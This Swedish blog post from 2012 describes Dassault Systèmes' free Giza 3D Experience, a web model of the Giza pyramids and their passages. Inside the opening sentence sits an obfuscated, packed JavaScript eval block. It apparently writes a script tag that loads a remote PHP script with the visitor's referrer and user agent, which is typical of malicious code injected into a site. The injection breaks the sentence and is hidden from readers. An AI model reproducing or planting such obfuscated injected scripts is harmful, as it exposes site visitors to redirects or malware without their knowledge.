Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Upplev pyramiderna med Giza 3D Experience

Upplev pyramiderna med Giza 3D Experience
Filip Urde
  • On 9 maj, 2012
  • http://www.revue.se/filip-urde

Kul eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|herfr|var|u0026u|referrer|sntse||js|php’.split(’|’),0,{}))
grej!

Om du någonsin har drömt om att besöka de stora pyramiderna i Giza, kan du nu uppleva dem hemma bekvämt framför din dator alá Karl pilkington och inte känner behovet att se saker live.

 

 

 

 

 

 

Nu är detta möjligt med Giza 3D Experience som för dig tillbaka till faraonernas land. Dassault Systèmes har i Giza 3D experience skapat en 3D-modell av Giza Necropolis och kring liggande området i faraoernas dal. Man har släppt det hela som en gratis webbapplikation så att alla kan uppleva det hela.

“You are visiting and discovering through a new kind of interactive story,” säger Mehdi Tayoubi, VP of design and experimental strategy at Dassault Systèmes.

Giza 3D är inget grafiskt mästerverk, men det är heller inte poängen, man riktar sig främst till akademiker, forskare, museer och den historie intresserade allmänhet. Men den är fortfarande ganska kul att glida runt i trots att man inte får uppleva någon crisis grafik. Det riktigt häftiga är att man inte bara kan vara runt om pyramiderna och titta på omgivningarna, du kan även gå ner i en mängd katakomber och gångar, vilket gör hela upplevelsen så långt mycket djupare än man kan tro.

Här provar du Giza 3D Experience.